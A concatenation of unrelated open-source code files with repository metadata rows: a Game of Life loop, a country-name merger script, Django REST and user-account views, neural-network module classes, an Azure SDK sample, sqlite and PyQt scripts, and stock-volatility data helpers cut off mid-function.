if currentCells[rightCoord][aboveCoord] == '#':
numNeighbors += 1 # Top-right neighbor is alive.
if currentCells[leftCoord][y] == '#':
numNeighbors += 1 # Left neighbor is alive.
if currentCells[rightCoord][y] == '#':
numNeighbors += 1 # Right neighbor is alive.
if currentCells[leftCoord][belowCoord] == '#':
numNeighbors += 1 # Botton-left neighbor is alive.
if currentCells[x][belowCoord] == '#':
numNeighbors += 1 # Botton neighbor is alive.
if currentCells[rightCoord][belowCoord] == '#':
numNeighbors += 1 # Bottom-right neighbor is alive.
# Set cell based on Conway's Game of Life rules:
if currentCells[x][y] == '#' and (numNeighbors == 2 or numNeighbors == 3):
# Living cells with 2 or 3 neighbors stay alive:
nextCells[x][y] = '#'
elif currentCells[x][y] == ' ' and numNeighbors == 3:
# Dead cells with 3 neighbors become alive:
nextCells[x][y] = '#'
else:
# Everthing else dies or stays dead:
nextCells[x][y] = ' '
time.sleep(2) # Add 2-second pause to reduce flickering.
| [
"mathiasgreg@gmail.com"
] | mathiasgreg@gmail.com |
ea10ff333638751d103c53c4fa8ba2f3e8e317e3 | a1f832c9a9f4d55f93c75ce6a124ebc96ea633e3 | /mapping/script/merger.py | 8d7ef7d6862fad481e618d5bec325c1685f95438 | [
"Apache-2.0"
] | permissive | bennymeg/IsraelPostalServiceAPI | 8409308e7a9e3f1d26c260efa71001b8d0ff7ce2 | 4cb18c2fe64e709b0864853ba3ea361b83a4470d | refs/heads/master | 2023-03-22T17:22:34.490674 | 2021-10-08T12:06:20 | 2021-10-08T12:06:20 | 152,899,161 | 5 | 2 | Apache-2.0 | 2023-03-04T02:55:42 | 2018-10-13T17:52:52 | TypeScript | UTF-8 | Python | false | false | 4,007 | py | # Copyright 2019 Benny Megidish
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import codecs
import json
from googletrans import Translator
"""
This script combines all possible country destinations into json files
@author Benny Megidish
"""
def _getAdjacentDirectory(adjacentDirectoryName):
return os.path.join(os.path.dirname(os.getcwd()), adjacentDirectoryName)
def getEnMappingDirectory():
return _getAdjacentDirectory("en")
def getHeMappingDirectory():
return _getAdjacentDirectory("he")
def getOutputDirectory():
return _getAdjacentDirectory("data")
def createEnCountryDict(filename):
en_country_map = open(os.path.join(getEnMappingDirectory(), filename))
en_country_dict = dict()
for line in en_country_map:
(_id, name) = line.split(', ', 1)
en_country_dict[_id] = name
return en_country_dict
def translate(text):
try:
translated_name = translator.translate(text, src='iw', dest='en').text
except:
translated_name = "TODO_" + text
return translated_name
def merge(mappingSourceFilename, debug=False):
''' iterates over every csv file int the input directory and generate an English dictionary for each file '''
he_directory_path = getHeMappingDirectory()
he_directory = os.fsencode(he_directory_path)
output_directory_path = getOutputDirectory()
en_country_dict = createEnCountryDict(mappingSourceFilename)
for _file in os.listdir(he_directory):
filename = os.fsdecode(_file)
if filename.endswith(".csv"):
input_file_path = os.path.join(he_directory_path, filename)
method_type = filename.replace(".csv", "-").split('-')[2].upper()
method_type = "ALL" if method_type == '' else method_type
output_file_path = os.path.join(output_directory_path, filename).replace(".csv", ".json")
output_dict_file = dict()
# read input country csv file
with open(input_file_path, "r", encoding="utf8") as map_file:
# create output country json file
for line in map_file:
(_id, name) = line.split(', ', 1)
name = name.rstrip()
if en_country_dict.__contains__(_id):
output_dict_file[en_country_dict[_id].rstrip()] = {'id': _id, 'name': name}
#map_file.write('%s, %s' % (line.rstrip(), en_country_dict[_id]))
if debug:
translated_name = translate(name)
print("%s: %s -> %s [%s]" % (method_type, name[::-1], en_country_dict[_id].rstrip(), translated_name))
else:
translated_name = translate(name)
output_dict_file[translated_name] = {'id': _id, 'name': name}
print("%s: Can't translate %s into English, defaulting to %s (google)" % (method_type, name[::-1], translated_name))
#map_file.write('%s, %s\n' % (line.rstrip(), "TODO"))
if (output_dict_file != None):
# save output json file
os.makedirs(getOutputDirectory(), exist_ok=True)
with codecs.open(output_file_path, "w", encoding="utf-8-sig") as map_file:
json.dump(output_dict_file, map_file)
if __name__ == "__main__":
translator = Translator()
merge('destination-map.csv') | [
"bennymegk@gmail.com"
] | bennymegk@gmail.com |
b3cb85f8e762425f2b99a69cc6f22debaafbd7aa | c4cbbe0823eec6d14d42922d4ef5a0046ca582df | /Product/urls.py | 4abcc9fac07f161a52795e87ff54d6f0144ab3c4 | [] | no_license | shakil102030/RestApiProject | 36cffeaaee9cff1ce7fe049639ff8ef28ba6ae11 | 50a5516907422eb3e6885668ad558e635d942f54 | refs/heads/main | 2023-07-04T18:05:51.450512 | 2021-08-23T13:25:37 | 2021-08-23T13:26:38 | 399,112,571 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 501 | py | from rest_framework import routers
from django.urls import path, include
from . import views
router = routers.DefaultRouter()
#router.register(r'', views.CategoryViewSet)
urlpatterns = [
#path('categorygf', include(router.urls))
path("categories", views.CategoryListAPIView.as_view()),
path("Food", views.FoodListAPIView.as_view()),
path("latest", views.LatestFoodsListAPIView.as_view()),
path('<slug:category_slug>/<slug:Food_slug>/', views.FoodDetailAPIView.as_view()),
]
| [
"shakilahmmed165@gmail.com"
] | shakilahmmed165@gmail.com |
c86c98ae72815124b24d3ae32ec5d6a1d90a7dca | 324d9bc6747873173cf457d563665f59005c0efc | /apps/users/views.py | ff8c38e6a8d915aa28bdd5f5db1eb3e22a995a8c | [] | no_license | jzxyouok/movie-1 | fd220618ce8c03bc3dc33d5b39a81547097653b2 | 650c05389aaefb84544d2246bf8436bed7157547 | refs/heads/master | 2020-06-03T16:00:01.479269 | 2018-05-30T09:22:43 | 2018-05-30T09:22:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,829 | py | from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import render
from django.urls import reverse
from django.contrib import messages
from django.contrib.auth.mixins import LoginRequiredMixin
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.hashers import make_password
from django.views.generic.base import View
from django.contrib.auth.backends import ModelBackend
from .models import UserProfile, EmailVerifyRecord
import json
from django.db.models import Q # 并集
from .forms import LoginForm, RegisterForm, ResetPwdForm, UserInfoForm, UploadImageForm, ForgetPwdForm
from apps.utils.email_send import send_register_email
# Create your views here.
class CustomBackend(ModelBackend):
"""
重写ModelBackend下的authenticate方法实现邮箱和用户名均可以登录
"""
def authenticate(self, request, username=None, password=None, **kwargs):
try:
user = UserProfile.objects.get(Q(username=username) | Q(email=username))
if user.check_password(password):
return user
except Exception as e:
return None
class LoginView(View):
# 直接调用get方法免去判断
def get(self, request):
redirect_url = request.GET.get('next', '')
return render(request, "users/login.html", {
"redirect_url": redirect_url
})
def post(self, request):
login_form = LoginForm(request.POST)
# is_valid判断我们字段是否有错执行我们原有逻辑,验证失败跳回login页面
if login_form.is_valid():
# 取不到时为空,username,password为前端页面name值
user_name = request.POST.get("username", "")
pass_word = request.POST.get("password", "")
# 成功返回user对象,失败返回null
user = authenticate(username=user_name, password=pass_word)
# 如果不是null说明验证成功
if user is not None:
# 只有当用户激活时才给登录
if user.is_active:
login(request, user)
redirect_url = request.POST.get('next', '')
if redirect_url:
return HttpResponseRedirect(redirect_url)
return HttpResponseRedirect(reverse("index"))
else:
return render(
request, "users/login.html", {
"msg": "用户名未激活! 请前往邮箱进行激活"})
# 当用户真的密码出错时
else:
return render(request, "users/login.html", {"msg": "用户名或密码错误!"})
# 验证不成功跳回登录页面
# 没有成功说明里面的值是None,并再次跳转回主页面
else:
return render(
request, "users/login.html", {
"login_form": login_form})
class ActiveUserView(View):
"""
激活注册用户
"""
def get(self, request, active_code):
# 查询邮箱验证记录是否存在
all_record = EmailVerifyRecord.objects.filter(code=active_code)
if all_record:
for record in all_record:
# 获取对应邮箱
email = record.email
user = UserProfile.objects.get(email=email)
user.is_active = True
user.save()
else:
return render(request, 'users/active_fail.html')
return render(request, 'users/login.html')
class RegisterView(View):
"""
注册视图
"""
def get(self, request):
register_form = RegisterForm()
return render(request, "users/register.html", {'register_form': register_form})
def post(self, request):
# 实例化生成注册表单
register_form = RegisterForm(request.POST)
if register_form.is_valid():
user_name = request.POST.get('email', None)
# 如果用户已经存在
if UserProfile.objects.filter(email=user_name):
return render(request, 'users/register.html',
{'register_form': register_form, 'msg': '用户已经存在'})
pass_word = request.POST.get('password', None)
# 实例化UserProfile
user_profile = UserProfile()
user_profile.username = user_name
user_profile.email = user_name
# 默认注册后用户是未激活的
user_profile.is_active = False
# hash算法加密密码
user_profile.password = make_password(pass_word)
user_profile.save()
send_register_email(user_name, 'register')
messages.success(request, "已经发送了激活邮件,请查收")
return render(request, 'users/register.html')
else:
return render(request, 'users/register.html', {'register_form': register_form})
class ResetPwdView(View):
"""
重设密码视图
"""
def post(self, request):
reset_form = ResetPwdForm(request.POST)
if reset_form.is_valid():
username = request.user.username
password1 = request.POST.get('password1', '')
password2 = request.POST.get('password2', '')
if password1 != password2:
return render(request, 'users/reset.html', {'msg': '两次输入的密码不一致'})
user = UserProfile.objects.get(username=username)
user.password = make_password(password2)
user.save()
return render(request, 'users/login.html', {'msg': '密码修改成功,请使用新密码登录'})
else:
# 密码位数不够
return render(request, 'users/reset.html', {'reset_form': reset_form})
class UserInfoView(LoginRequiredMixin, View):
"""
用户中心视图
"""
login_url = '/login/'
redirect_field_name = 'next'
def get(self, request):
return render(request, 'users/user.html')
def post(self, request):
# 修改,增加instance属性
user_info_form = UserInfoForm(request.POST, instance=request.user)
if user_info_form.is_valid():
user = UserProfile.objects.get(pk=request.user.id)
user.nick_name = user_info_form.cleaned_data['nick_name']
user.gender = user_info_form.cleaned_data['gender']
user.sign = user_info_form.cleaned_data['sign']
user.address = user_info_form.cleaned_data['address']
user.mobile = user_info_form.cleaned_data['mobile']
user.save()
return HttpResponseRedirect(reverse('user_info'))
else:
# 通过json的dumps方法把字典转换成字符串
return HttpResponse(
json.dumps(user_info_form.errors),
content_type='application/json'
)
class UploadImageView(LoginRequiredMixin, View):
"""
用户头像修改
"""
def post(self, request):
image_form = UploadImageForm(request.POST, request.FILES)
if image_form.is_valid():
image = image_form.cleaned_data['image']
request.user.image = image
request.user.save()
# return HttpResponse('{"status": "success"}', content_type='application/json')
return HttpResponseRedirect(reverse('user_info'))
else:
return HttpResponse('{"status": "fail"}', content_type='application/json')
class ForgetPwdView(View):
"""
找回密码视图
"""
def get(self, request):
forget_form = ForgetPwdForm()
return render(request, 'users/forgetpwd.html', {'forget_form': forget_form})
def post(self, request):
forget_form = ForgetPwdForm(request.POST)
if forget_form.is_valid():
email = request.POST.get('email', None)
send_register_email(email, 'forget')
return render(request, 'index.html')
else:
return render(request, 'users/forgetpwd.html', {'forget_form': forget_form})
class ResetView(View):
def get(self, request, active_code):
all_records = EmailVerifyRecord.objects.filter(code=active_code)
if all_records:
for record in all_records:
email = record.email
return render(request, "users/reset.html", {"email": email})
else:
return render(request, "users/active_fail.html")
return render(request, "users/login.html")
class LogOutView(View):
"""
退出登录
"""
def get(self, request):
logout(request)
return HttpResponseRedirect(reverse('index'))
| [
"18778335525@163.com"
] | 18778335525@163.com |
acba31f7ed54309ed5f26550cbdff2ef54d18d26 | 37b9a6558e61a5a4ebe49b55a68bd3c9785b1f52 | /accounts/signals.py | ed79c66f34a9ce087898e65cf72dfaf450abb75c | [] | no_license | reemsamir1999/DjangoRest-Lab-ITI | 5d493bbb671319975d4303863507fd3d8800bf74 | 1f6dfd95682eca4ff1ba0cc633c278dc6d3ece08 | refs/heads/main | 2023-08-26T05:47:44.046912 | 2021-11-13T17:08:30 | 2021-11-13T17:08:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 365 | py | from django.db.models import signals
from django.dispatch import receiver
from django.contrib.auth.models import User
from rest_framework.authtoken.models import Token
from django.db.models.signals import post_save
@receiver(post_save, sender=User)
def user_created(sender, instance, created, **kwargs):
if created:
Token.objects.create(user=instance) | [
"reemsamir521999@gmail.com"
] | reemsamir521999@gmail.com |
4b3999bceb135ae43088f2acd45fd813a32aa724 | 330899fd4a9653e05e2a09e0a4f30c119af97ad4 | /python/hidet/tos/modules/nn.py | 3d1c65c10d426d6b2298130ea875a54bbf014694 | [
"Apache-2.0"
] | permissive | yaoyaoding/hidet-artifacts | f8a4707c7fc28aa7bfa4dab3a9f2a9387c020f99 | f2e9767bb2464bd0592a8ec0b276f97481f13df2 | refs/heads/main | 2023-04-30T13:12:57.350002 | 2023-04-24T19:37:34 | 2023-04-24T19:37:34 | 551,692,225 | 3 | 1 | Apache-2.0 | 2022-11-01T23:25:17 | 2022-10-14T22:40:28 | Python | UTF-8 | Python | false | false | 5,063 | py | from typing import Optional, Union, List
import math
from hidet.tos import ops
from hidet.tos.common import normalize
from hidet.tos.module import Module, Tensor
from hidet.tos.tensor import randn, zeros, ones
from hidet.tos.modules.container import Sequential, ModuleList
class Conv2d(Module):
def __init__(self, in_channels, out_channels, kernel_size, padding=0, stride=1, groups=1):
super().__init__()
self.in_channels = in_channels
self.out_channels = out_channels
self.kernel = normalize(kernel_size)
self.padding = normalize(padding)
self.stride = normalize(stride)
self.groups = groups
self.weight = randn(shape=[out_channels, in_channels, *self.kernel], dtype='float32', stddev=1.0 / math.sqrt(out_channels))
def extra_str(self) -> str:
return 'in_channels={}, out_channels={}, kernel_size={}, stride={}, padding={}'.format(self.in_channels, self.out_channels, self.kernel, self.stride, self.padding)
def forward(self, x):
x = ops.pad(x, ops.utils.normalize_padding(self.padding))
return ops.conv2d(x, self.weight, self.stride, self.groups)
class BatchNorm2d(Module):
def __init__(self, num_features, eps=1e-5):
super().__init__()
self.eps = eps
self.running_mean = zeros(shape=[num_features])
self.running_var = ones(shape=[num_features])
def extra_str(self) -> str:
return 'eps={}'.format(self.eps)
def forward(self, x: Tensor):
return ops.batch_norm_infer(x, self.running_mean, self.running_var, self.eps)
class Linear(Module):
def __init__(self, in_features, out_features, bias: bool = True):
super().__init__()
self.in_features = in_features
self.out_features = out_features
self.weight = randn(shape=[in_features, out_features], stddev=1.0 / math.sqrt(in_features))
if bias:
self.bias = zeros(shape=[out_features])
else:
self.bias = None
def extra_str(self) -> str:
return 'in_features={}, out_features={}'.format(self.in_features, self.out_features)
def forward(self, x: Tensor) -> Tensor:
return ops.matmul(x, self.weight) + self.bias
class Relu(Module):
def forward(self, x):
return ops.relu(x)
class MaxPool2d(Module):
def __init__(self, kernel_size, stride=1, padding=0):
super().__init__()
self.kernel = kernel_size
self.stride = stride
self.padding = padding
def extra_str(self) -> str:
return 'kernel_size={}, stride={}, padding={}'.format(self.kernel, self.stride, self.padding)
def forward(self, x):
return ops.max_pool2d(x, self.kernel, self.stride, self.padding)
class AvgPool2d(Module):
def __init__(self, kernel_size, stride, padding):
super().__init__()
self.kernel = kernel_size
self.stride = stride
self.padding = padding
def extra_str(self) -> str:
return 'kernel_size={}, stride={}, padding={}'.format(self.kernel, self.stride, self.padding)
def forward(self, x):
return ops.avg_pool2d(x, self.kernel, self.stride, self.padding)
class AdaptiveAvgPool2d(Module):
def __init__(self, output_size):
super().__init__()
self.output_size = normalize(output_size)
assert tuple(self.output_size) == (1, 1), 'current only support this'
def extra_str(self) -> str:
return 'output_size={}'.format(self.output_size)
def forward(self, x: Tensor) -> Tensor:
n, c, h, w = x.shape
return ops.avg_pool2d(x, kernel=(h, w), stride=(1, 1), padding=(0, 0))
class Embedding(Module):
def __init__(self, num_embeddings: int, embedding_dim: int):
super().__init__()
self.num_embeddings = num_embeddings
self.embedding_dim = embedding_dim
self.weight = randn(shape=[num_embeddings, embedding_dim], dtype='float32', mean=0.0, stddev=1.0)
def forward(self, indices: Tensor) -> Tensor:
return ops.take(self.weight, indices, axis=0)
class LayerNorm(Module):
def __init__(self, normalized_shape: Union[int, List[int]], eps: float = 1e-5, elementwise_affine: bool = True):
super().__init__()
if isinstance(normalized_shape, int):
normalized_shape = (normalized_shape,)
self.normalized_shape = tuple(normalized_shape)
self.eps = eps
self.elementwise_affine = elementwise_affine
if elementwise_affine:
self.weight = ones(normalized_shape)
self.bias = zeros(normalized_shape)
else:
self.weight = None
self.bias = None
def forward(self, x: Tensor) -> Tensor:
x = ops.layer_norm(x)
if self.weight:
x = x * self.weight
if self.bias:
x = x + self.bias
return x
class Gelu(Module):
def forward(self, x):
return x * (ops.erf(x * (1.0 / 1.4142135381698608)) + 1.0) * 0.5
class Tanh(Module):
def forward(self, x):
return ops.tanh(x)
| [
"dingyaoyao.cs@gmail.com"
] | dingyaoyao.cs@gmail.com |
5ee1c1836ae680d8569f59bc57ec21d2b1998ea4 | e9163cb33f6cd1a898884bd2c6144c28a8c156bd | /sql/sqli.py | 94e77ae81f79bd73fee2cd170b459ebe39cc1c71 | [] | no_license | SimoCi/RealPython2 | 73d5bea10a2021d161a8699a303fb8fcad59a486 | ddf0ea2e689bb73a171aafc7cfa9d47702846b09 | refs/heads/master | 2021-01-02T08:10:05.082573 | 2014-11-05T14:05:24 | 2014-11-05T14:05:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 693 | py | import sqlite3
with sqlite3.connect("new.db") as conn:
crs = conn.cursor()
cities = [
('Boston', 'MA', 600000),
('Los Angeles', 'CA', 38000000),
('Houston', 'TX', 2100000),
('Philadelphia', 'PA', 1500000),
('San Antonio', 'TX', 1400000),
('San Diego', 'CA', 130000),
('Dallas', 'TX', 1200000),
('San Jose', 'CA', 900000),
('Jacksonville', 'FL', 800000),
('Indianapolis', 'IN', 800000),
('Austin', 'TX', 800000),
('Detroit', 'MI', 700000)
]
crs.executemany("INSERT into populations VALUES (?,?,?)", cities)
crs.execute("SELECT * FROM populations WHERE population > 1000000")
rows = crs.fetchall()
for r in rows:
print r[0], r[1], r[2] | [
"simonecidesk@gmail.com"
] | simonecidesk@gmail.com |
eca4f2b0434e257082837eb9629ff0e723bcea9f | 6c05ce7733b3c6839a0d650d1168233650b4dc6f | /PythonLibrary/spline_inverse/InterpolateCurve.py | c2a0b3eae0b82a133a45341e9c149dd7016d9f87 | [] | no_license | jessdtate/FwdInvToolkit | 7efb0836ecaaf5327023b94a78bb3ca5584b390e | 861824224c30882f7bf56d1abe0717621c0dafa9 | refs/heads/master | 2021-01-15T17:46:05.957770 | 2017-09-15T16:51:35 | 2017-09-15T16:51:35 | 38,811,038 | 1 | 0 | null | 2017-09-15T07:35:50 | 2015-07-09T09:21:56 | Matlab | UTF-8 | Python | false | false | 3,171 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Jul 20 09:45:02 2016
@author: andrewcorbato
"""
def InterpolateCurve(CurveParameters,InterpolationDensity,varargin):
# author: Burak Erem
# input: varargin should be a list
import numpy as np
# check type of varargin
if type(varargin) != type([]):
varargin = list(varargin)
if type(varargin) != type([]):
import sys
sys.exit('ERROR: varargin must be a python list or compatible w/ list().')
# input sizes and number of elements
dims_CurveParameters = np.shape(CurveParameters)
prod_dims_CurveParameters = np.prod(dims_CurveParameters,axis=0)
dims_dims_CurveParameters = np.shape(dims_CurveParameters)
numel_dims_dims = dims_dims_CurveParameters[0]*dims_dims_CurveParameters[1]
PeriodicityFlag = np.zeros((numel_dims_dims-1,1))
numel_varg = len(varargin)
if numel_varg > 0:
p = 'periodic'
for ii in range(0,numel_varg,1):
if varargin[ii].lower() == p:
# unless this is followed by a numeric array of dimension
# indices that should be periodic,
# assume they are all periodic
if numel_varg > ii:
if type(varargin[ii+1]) != type(p):
PeriodicityFlag(varargin[ii+1]) = 1
dims_PeriodicityFlag = np.shape(PeriodicityFlag)
numel_PeriodicityFlag = dims_PeriodicityFlag[0]*dims_PeriodicityFlag[1]
if numel_PeriodicityFlag > (numel_dims - 1):
print('WARNING: Dimensions specified as being periodic \
exceed input dimensions. \n')
else:
PeriodicityFlag = np.ones((dims_PeriodicityFlag[0],dims_PeriodicityFlag[1]))
# Form 1-D spline interpolation matrices of appropriate sizes
# TensorEdgeDimensions = np.sort(np.unique(dims_CurveParameters[2,-1]))
# for jj = TensorEdgeDimensions
# SplineMatrix[i-2]=np.transpose(splineMatrix(i-2,1,InterpolationDensity))
TensorEdgeDimensions = dims_CurveParameters[1:-1]
dims_TensorEdgeDimensions = np.shape(TensorEdgeDimensions)
numel_Tensor = dims_TensorEdgeDimensions[0]*dims_TensorEdgeDimensions[1]
SplineMatrix = [None]*numel_Tensor
for jj in range(0,numel_Tensor,1):
if PeriodicityFlag[jj] == 0: # if not periodic
SplineMatrix[jj] = np.transpose(splinematrix(TensorEdgeDimensions[jj]-2,1,InterpolationDensity))
else: # if periodic
SplineMatrix[jj] = np.transpose(splinematrix(TensorEdgeDimensions[jj]-2,1,InterpolationDensity,'Periodic'))
# intialize interpolated curves as curve parameters
InterpolatedCurve = CurveParameters
# Interpolate spline curves using tensor-matrix "right" multiplication, for
# all the "right-hand" sides (i.e. tensor indices, not including the first one)
for kk in range(0,(numel_dims_dims-1),1):
InterpolatedCurve = tensorRightMatrixMultiply(InterpolatedCurve,kk,SplineMatrix[kk])
return InterpolatedCurve
| [
"noreply@github.com"
] | jessdtate.noreply@github.com |
794362f36d7dd92514eab05c05e9543d1f388498 | 22dcb4b838b4d9b30db2c294600e509dd9399685 | /0511/abridgement_practice.py | b16b3abbc93ec8fd0b99c1035b2089718db8b2ce | [] | no_license | KuboIroha/PythonPractice | 0a761776adf319a8fa08ea88f07efcca9c09bc16 | 406fa7b5dc1730974e783aaba19d37f632995cf7 | refs/heads/master | 2023-05-01T03:35:37.317227 | 2021-05-23T08:38:03 | 2021-05-23T08:38:03 | 366,095,855 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 182 | py | #coding UTF-8
x=10
print(x)
#たしざん
x += 10
print(x)
#ひきざん
x -= 10
print(x)
#掛け算
x *= 10
print(x)
#わりざん
x /= 10
print(x)
#あまり
x %= 10
print(x) | [
"bjik1290502@gn.iwasaki.ac.jp"
] | bjik1290502@gn.iwasaki.ac.jp |
a3b7d2043d073baae61c82a62a7baf513e5463d4 | 117aaf186609e48230bff9f4f4e96546d3484963 | /others/FilterTable/main.py | c18d99d897d4e53baba8675c35fbb4fd3a1f0667 | [
"MIT"
] | permissive | eyllanesc/stackoverflow | 8d1c4b075e578496ea8deecbb78ef0e08bcc092e | db738fbe10e8573b324d1f86e9add314f02c884d | refs/heads/master | 2022-08-19T22:23:34.697232 | 2022-08-10T20:59:17 | 2022-08-10T20:59:17 | 76,124,222 | 355 | 433 | MIT | 2022-08-10T20:59:18 | 2016-12-10T16:29:34 | C++ | UTF-8 | Python | false | false | 1,326 | py | import csv
import sys
from PyQt4 import QtGui
from PyQt4 import uic
from PyQt4.QtCore import QString
from PyQt4.QtGui import QTableWidgetItem
filter_class = uic.loadUiType("filter.ui")[0]
class Filter_window(QtGui.QWidget, filter_class):
def __init__(self, parent=None, *args, **kwargs):
QtGui.QMainWindow.__init__(self, parent)
self.setupUi(self)
self.loadAll()
def loadAll(self):
with open("Rts.csv", "rb") as inpfil:
reader = csv.reader(inpfil, delimiter=',')
csheader = reader.next()
ncol = len(csheader)
data = list(reader)
row_count = len(data)
self.filterall.setRowCount(row_count)
self.filterall.setColumnCount(ncol)
self.filterall.setHorizontalHeaderLabels(QString('%s' % ', '.join(map(str, csheader))).split(","))
for ii in range(0, row_count):
print data[ii]
mainins = data[ii]
print mainins
for var in range(0, ncol):
print mainins[var], "\n"
self.filterall.setItem(ii, var, QTableWidgetItem(mainins[var]))
if __name__ == '__main__':
app = QtGui.QApplication(sys.argv)
filterwin = Filter_window()
filterwin.show()
sys.exit(app.exec_())
| [
"e.yllanescucho@gmail.com"
] | e.yllanescucho@gmail.com |
240e6d72e883cd5d44adc7bc87f9e6646c36762c | aa0270b351402e421631ebc8b51e528448302fab | /sdk/paloaltonetworks/azure-mgmt-paloaltonetworksngfw/generated_samples/post_rules_delete_minimum_set_gen.py | 37e8eb6f0bb63131b561033cfb6c8b88a6e137ab | [
"MIT",
"LGPL-2.1-or-later",
"LicenseRef-scancode-generic-cla"
] | permissive | fangchen0601/azure-sdk-for-python | d04a22109d0ff8ff209c82e4154b7169b6cb2e53 | c2e11d6682e368b2f062e714490d2de42e1fed36 | refs/heads/master | 2023-05-11T16:53:26.317418 | 2023-05-04T20:02:16 | 2023-05-04T20:02:16 | 300,440,803 | 0 | 0 | MIT | 2020-10-16T18:45:29 | 2020-10-01T22:27:56 | null | UTF-8 | Python | false | false | 1,613 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.identity import DefaultAzureCredential
from azure.mgmt.paloaltonetworks import PaloAltoNetworksNgfwMgmtClient
"""
# PREREQUISITES
pip install azure-identity
pip install azure-mgmt-paloaltonetworks
# USAGE
python post_rules_delete_minimum_set_gen.py
Before run the sample, please set the values of the client ID, tenant ID and client secret
of the AAD application as environment variables: AZURE_CLIENT_ID, AZURE_TENANT_ID,
AZURE_CLIENT_SECRET. For more info about how to get the value, please see:
https://docs.microsoft.com/azure/active-directory/develop/howto-create-service-principal-portal
"""
def main():
client = PaloAltoNetworksNgfwMgmtClient(
credential=DefaultAzureCredential(),
subscription_id="SUBSCRIPTION_ID",
)
response = client.post_rules.begin_delete(
global_rulestack_name="lrs1",
priority="1",
).result()
print(response)
# x-ms-original-file: specification/paloaltonetworks/resource-manager/PaloAltoNetworks.Cloudngfw/preview/2022-08-29-preview/examples/PostRules_Delete_MinimumSet_Gen.json
if __name__ == "__main__":
main()
| [
"noreply@github.com"
] | fangchen0601.noreply@github.com |
9a05bb883ba068c5b2d77669562c68b4b2037e4b | 9d2d6b29662ee32dfaef72504cc85981f29b5fca | /volat.py | 6fe5fee87019a4ae22e903cdb5163b91378e111a | [] | no_license | jingmouren/Volatility-Prediction | 63e9ed1705e23330a34e3bb4bf5091b1f680cff2 | 36d1dd79ffa8f2af6baed12f81b6003c58aea4c4 | refs/heads/main | 2023-08-26T06:51:43.204776 | 2021-10-31T17:01:51 | 2021-10-31T17:01:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,592 | py | # The function below takes the file name corresponding to a stock and returns the stock_id
def stock_id(name):
import re
i = re.search(r'\d+', name).group(0)
i = int(i)
return i
# The function below takes the path of a folder containing stock files and returns a list of the contained file paths
# sorted by stock_id
def files(folder):
import glob
file_names = glob.glob(folder+'/*')
file_names.sort(key=stock_id)
return file_names
# The function below takes a list of stock files, a number n and and a boolean value. And returns the concatenation of
# of n the respective dataframes with and additional 'stock_id' columns. If the boolean value is TRUE it uses the first
# n files, if the boolean value is FALSE it chooses randomly n files.
def sub_frame(file_names, number, sequential):
import random
import pandas as pd
if sequential:
file_names = file_names[0:number]
else:
file_names = random.sample(file_names, number)
data_frames = []
for filename in file_names:
i = stock_id(filename)
parquet_file = str(filename)
frame = pd.read_parquet(parquet_file, engine='auto')
size = frame.shape[0]
column = [i] * size
frame['ID'] = column
data_frames.append(frame)
data = pd.concat(data_frames)
return data
# The function below takes a stock dataframe and returns the first and last row of a random group. By group we mean a
# a set of rows corresponding to the same time_id. The probability of each group is analogous to its size.
def random_batch(frame):
import random
n = frame.shape[0]
stock_list = list(range(n))
k = random.choice(stock_list)
i = k
right_end = k
while frame.loc[i].at["time_id"] == frame.loc[k].at["time_id"]:
right_end = i
i = i + 1
i = k
left_end = k
while frame.loc[i].at["time_id"] == frame.loc[k].at["time_id"]:
left_end = i
i = i - 1
batch_locations = list(range(left_end, right_end + 1))
return batch_locations
# The function below prints a parquet file given it's path.
def parquet_print(filename):
import pandas as pd
parquet_file = str(filename)
frame = pd.read_parquet(parquet_file, engine='auto')
print(frame)
# Similarly for csv files
def csv_print(filename):
import pandas as pd
parquet_file = str(filename)
frame = pd.read_csv(parquet_file)
print(frame)
# The function below returns the dataframe contained in a parquet file given its path.
def parquet_frame(filename):
import pandas as pd
parquet_file = str(filename)
frame = pd.read_parquet(parquet_file)
return frame
#Similarly for csv files
def csv_frame(filename):
import pandas as pd
parquet_file = str(filename)
frame = pd.read_csv(parquet_file)
return frame
# The function below takes a stock data frame and a number k and returns the first and last row of the
# time_id-group containing the k_th row
def local_patch(frame, k):
n = frame.shape[0]
time_id = frame.loc[k].at["time_id"]
if time_id == 5:
i = k
right_end = k
while frame.loc[i].at["time_id"] == time_id:
right_end = i
i = i + 1
patch_locations = (time_id, 0, right_end)
elif time_id == 32767:
i = k
left_end = k
while frame.loc[i].at["time_id"] == time_id:
left_end = i
i = i - 1
patch_locations = (time_id, left_end, n-1)
else:
i = k
right_end = k
while frame.loc[i].at["time_id"] == time_id:
right_end = i
i = i + 1
i = k
left_end = k
while frame.loc[i].at["time_id"] == time_id:
left_end = i
i = i - 1
patch_locations = (time_id, left_end, right_end)
return patch_locations
# The function below takes in a stock dataframe and a number between r 0 and 1. It returns a random list
# of time_id-groups so that the total arrows of the groups do not exceed r*(size of the dataframe). The time_id groups
# are represented as (first row of group, last row fo group)
def file_sample(frame, percentage):
import random
n = frame.shape[0]
rows = 0
patches = []
k = random.choice(range(n))
patch = local_patch(frame, k)
rows = rows + patch[2] - patch[1] + 1
while rows <= percentage * n:
patches.append(patch)
k = random.choice(range(n))
patch = local_patch(frame, k)
rows = rows + patch[2] - patch[1] + 1
return patches
# The function below takes in a stock dataframe a list of time_id-groups of that dataframe (groups represented as in
# the function above) and a real number r. It splits the list of time_id groups according to the real number and then
